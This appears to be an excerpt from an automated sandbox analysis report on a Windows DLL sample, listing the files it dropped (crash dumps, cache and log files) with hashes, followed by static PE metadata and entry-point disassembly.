                                                                                                                                                                          SHA1:5F9F8B1D1514A8B2B43F13FC59F7E428056CFB72
                                                                                                                                                                          SHA-256:3C54E99C75E7D7B967C4DA9B5E5E3EE5DF5405BF1FBA3F0EDCF95BD88B1FC9A0
                                                                                                                                                                          SHA-512:E5CD9988E3F5D1DBD7EF8497FFC606B41DD9FAE572F30B1D47275F7E0EAC9D5131DD0BE3811D4E40C6F7CC311B951930A7B57DD96EAF5047B730C0B1E35FE96F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.7.2.<./.P.i.d.>.......
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7F5.tmp.xml
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4598
                                                                                                                                                                          Entropy (8bit):4.473324312213759
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwSD8zsyJgtWI9KsWSC8Bk8fm8M4J2++ZFc+q84pDiKcQIcQw0VTd:uITfA5FSNbJ44liKkw0VTd
                                                                                                                                                                          MD5:640FFEC2FF06DAA6C630678A1F7EC1FF
                                                                                                                                                                          SHA1:91F7F224D80C08146C10BFDF88207714330A35A3
                                                                                                                                                                          SHA-256:2EC5C6AFE156A05D10C6EB691529428384543786E3E1605D94E726CB387FD4E3
                                                                                                                                                                          SHA-512:52324B123DCB5DFC9F4A5B228B158C189F14390D54D348382DC274BF27AF96AB684CE526DD5E376040C2AF42E654964D7888CB5BA72525CFF9E881918DF75812
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342356" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC72.tmp.dmp
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Fri Jan 14 19:25:49 2022, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):42088
                                                                                                                                                                          Entropy (8bit):2.0693295556570783
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:RZtMMnOmcN8FhOtg69O740oMDEzJkUDibULb5aLoztNTQqfF:YmE8FhOtg69O74fzJtDigLb5aqtNTZ
                                                                                                                                                                          MD5:11737502E70CE0130A2D20512CBB0B00
                                                                                                                                                                          SHA1:891E1C68E0581F80A1DC70B8F31037B8DB4D81AC
                                                                                                                                                                          SHA-256:3EF75C3F85764DC20F47F91BB544CDE5193E84C8FF11FDC4DAF7689848DCCF2F
                                                                                                                                                                          SHA-512:DBF19E12D7785D64BB06DE549C506570E2ED77F7750EF3C11219008A30F915345EC037652E434DCF28735AA9400A3A83FC72B58323D36CAC9E5DF1A687CA55CA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: MDMP....... .......=..a........................................`...........~#..........`.......8...........T...............p...........,................................................................................U...........B..............GenuineIntelW...........T.......H...&..a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF221.tmp.WERInternalMetadata.xml
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8302
                                                                                                                                                                          Entropy (8bit):3.694961965915991
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:Rrl7r3GLNiFo6Sfoi6YILSU511gmfISiCprb89bWIsf1Sm:RrlsNi66Sfoi6YESU511gmfISWW7fR
                                                                                                                                                                          MD5:79D81E97A8E9704B1D381B87C2266F46
                                                                                                                                                                          SHA1:EA4DAFA53D4D013D541586A7751515CFACA1EC6F
                                                                                                                                                                          SHA-256:3AB9591AFEEE6F1B353C4FE292514A69C81471D42F26C56E2ACF6245ED679577
                                                                                                                                                                          SHA-512:ECA2C2852947657043422F4B54C848B8EAA3379694407159EAF47E64EA46EFC17758739CEDE2159012CE8ADE0BCE7AC2D0657F0CF7470500496CF2C1078743C8
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.7.2.<./.P.i.d.>.......
                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERF638.tmp.xml
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4556
                                                                                                                                                                          Entropy (8bit):4.427763045264665
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwSD8zsyJgtWI9KsWSC8B/8fm8M4J2+gwFV+q84/lNKcQIcQw0VTd:uITfA5FSNCJrPKkw0VTd
                                                                                                                                                                          MD5:AFB8AEE1CDE13505DF3929E4052C9B6E
                                                                                                                                                                          SHA1:6C96ACFCC1FD6EA35F18A0957BCB8EEEB2806248
                                                                                                                                                                          SHA-256:CA1EC20227250833D792E610B82C48FA9A703028BF7E36EA932C71F38E1DA43E
                                                                                                                                                                          SHA-512:390A7FF82899F98C68E6685D3D917CD8B4C80C3E7A9AD2B7297C227F11A53A28B3940583BCD45FA951D4F7BB2596BC154803084FE034B504B18CB18830D4F18F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342356" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):61414
                                                                                                                                                                          Entropy (8bit):7.995245868798237
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                                                                                          MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                                                                                          SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                                                                                          SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                                                                                          SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....
                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                          Entropy (8bit):3.118359240275541
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:kKtKk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:89kPlE99SNxAhUeYlUSA/t
                                                                                                                                                                          MD5:5CFFDDB7E5E73F8E41C9116E53F06B93
                                                                                                                                                                          SHA1:6D66AEEFE8482A3E49FA583C7502ABC2FEC26D55
                                                                                                                                                                          SHA-256:F062EF4AE1B4FFDFD14747BC727BE528BCE16C9C1A15280EEE9785BBD7936EC0
                                                                                                                                                                          SHA-512:C64A93952987B78AD4BABC1632F4DD8CECF4F4EA8E0BE1DD2694745EECBCE04B2C07E1EED4337B435E1A8ED5C4B40FD5E0CFC3A983A9F589D7D47EE568DAF138
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: p...... ............|...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):7250
                                                                                                                                                                          Entropy (8bit):3.1666684985319797
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTE6+Abn:cY+38+DJc+iGr+MZ+65+6tg+EC1+q
                                                                                                                                                                          MD5:C7E96BE772078246678F5DA12EBFD10D
                                                                                                                                                                          SHA1:80E5E1B354AA8A0CAD204C1CC7BB62B0B21932EA
                                                                                                                                                                          SHA-256:B75E74968C48B1278F4B340E6D3321BE9D29CAB386AD3F6F25321E607B19DD23
                                                                                                                                                                          SHA-512:1DE9D332CD3482F27E416C121A5B89D6EE044F7B7D0B980ACF66B79CAA3AEC95A6DFCCA2DF7B9C94BC7D021BD693773AC12668EE8BBE9D1725222866AB862938
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                                          C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220114_192545_004.etl
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                          Entropy (8bit):3.791932756162854
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:QClC9po+rG5hS932YDbCQkI2lMRkdi4qwT2HYFzQUMCxM6JRab5JhY57bMCMl5Mr:DO/mBU2ABXCx/uCgCeCaC5Co
                                                                                                                                                                          MD5:B26DC9FBEB9C722E9628B65EA420D9FE
                                                                                                                                                                          SHA1:D0C0724978CBD093A3A9E91BF3E0A3B26D097863
                                                                                                                                                                          SHA-256:3CFC9C66743E9C218F53E4A5984616A52DC433EA05FF79A807AF25F716C25994
                                                                                                                                                                          SHA-512:CDF7CAD5B15383870FD482DB976799447491E72A6B3680057B1AFED9B4D48A94582BAE570444D20A79A8252037E1041E7B379A469E449816DD8E8F6C8E5949CA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: .... ... ....................................... ...!............................................................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... ......z.|...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.4._.1.9.2.5.4.5._.0.0.4...e.t.l.........P.P.................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1572864
                                                                                                                                                                          Entropy (8bit):4.260154673450468
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:8pcqgXRn9rvB7Futx5kpbB5+oT70iHfD+nIf1FYiRASbinq8iYD+mUlp:2cqgXRn9rvB7Futi1nZp
                                                                                                                                                                          MD5:7B7BBE58B6666BFE421BB7ABF4037C4F
                                                                                                                                                                          SHA1:2542517F1F1EF001BD76817D14A2E1BFFC988A5A
                                                                                                                                                                          SHA-256:D990176456B2AFF01C5CB4C806317F49FC54F7B2290996A76EED113D54010F68
                                                                                                                                                                          SHA-512:686F1ED99013985A049A487DE35F28EF7BBFA6233DA096F9FF8BC6E0AC0460925A0C27E053BE11A74C901D9A7A323502BA2FA0D34C22CF03CC28DC36FAD3E00C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: regfR...R...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmj...|...............................................................................................................................................................................................................................................................................................................................................V...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                          Entropy (8bit):3.0444681831926217
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:G05DZ1GutzXZ+YT5FSE9lMqXyQVWnxuYW2oUKqe8mxwpVuN5Y:JZl5TXQnxuf2oUPmxwpVuN5Y
                                                                                                                                                                          MD5:58C0483C09BF8B2DFD7B5AFEF8ADC476
                                                                                                                                                                          SHA1:16B39BFB04F58BFF07F9199D01DE7279D8B77DCF
                                                                                                                                                                          SHA-256:7D5F1E5C8747D9BEA91E2A1A62B3BA5089114054DEC2B529BFABD09636188F08
                                                                                                                                                                          SHA-512:CC4CDA216B67238F263B53E0E0AAF34550102AD9D03451F3E14DF60E9197EA317F9159C4340D4432A5AA02A802246489897662659D47059A0BF2D64133729F06
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmj...|...............................................................................................................................................................................................................................................................................................................................................P...HvLE.>......Q...........\N)...].C.v..A..........................hbin................p.\..,..........nk,..b..|.......p........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..b..|....... ...........P............... .......Z.......................Root........lf......Root....nk ..b..|....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.08798060969997
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 95.65%
                                                                                                                                                                          • Win32 EXE PECompact compressed (generic) (41571/9) 3.97%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.19%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.19%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:xxWrY2YG7s.dll
                                                                                                                                                                          File size:417792
                                                                                                                                                                          MD5:9abf4d1ba2a69aa4188ced6fb4603521
                                                                                                                                                                          SHA1:96c629d97003101dc767dea1904906f0d1d397f1
                                                                                                                                                                          SHA256:d3812d7714e2ef78ddeec78ccc9384d41dd3a36e61b2724b0da81833e750df58
                                                                                                                                                                          SHA512:9ff88b4eec0daa4b7872866bcb1edba459cdad54a1728ac3d2b1e16dfefd989216f6f8fb2c8612b5e5a714dccad581c41056de6122964e2535e946f86cd32e6d
                                                                                                                                                                          SSDEEP:6144:o1ju3jPam65ucnNgDoDUhuGGwKveuR4VKYjHyCAJOhrmBlDxqms9ujAJKedmL/:yMjcuDaUImzStJorohvsMjmKe
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z'...F...F...F...I...F...I...F...F...D..9....F..9....F..9....F..9....F..9....F..9....F..Rich.F..................PE..L...k+.a...

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:71b018ccc6577131

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x10017b85
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x10000000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                          Time Stamp:0x61E02B6B [Thu Jan 13 13:38:51 2022 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:90add561a8bf6976696c056c199a41b8

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          cmp dword ptr [esp+08h], 01h
                                                                                                                                                                          jne 00007FA13904B497h
                                                                                                                                                                          call 00007FA139053218h
                                                                                                                                                                          push dword ptr [esp+04h]
                                                                                                                                                                          mov ecx, dword ptr [esp+10h]
                                                                                                                                                                          mov edx, dword ptr [esp+0Ch]
                                                                                                                                                                          call 00007FA13904B382h
                                                                                                                                                                          pop ecx
                                                                                                                                                                          retn 000Ch
                                                                                                                                                                          push 00000000h
                                                                                                                                                                          push dword ptr [esp+14h]
                                                                                                                                                                          push dword ptr [esp+14h]
                                                                                                                                                                          push dword ptr [esp+14h]
                                                                                                                                                                          push dword ptr [esp+14h]
                                                                                                                                                                          call 00007FA139053280h
                                                                                                                                                                          add esp, 14h
                                                                                                                                                                          ret
                                                                                                                                                                          push eax
                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          mov dword ptr [eax], ebp
                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                          mov eax, dword ptr [10057A08h]
                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                          push eax
                                                                                                                                                                          push dword ptr [ebp-04h]
                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                          ret
                                                                                                                                                                          push eax
                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          mov dword ptr [eax], ebp
                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                          mov eax, dword ptr [10057A08h]
                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [ebp-10h], esp
                                                                                                                                                                          push dword ptr [ebp-04h]
                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                          ret
                                                                                                                                                                          push eax
                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                          lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                          sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
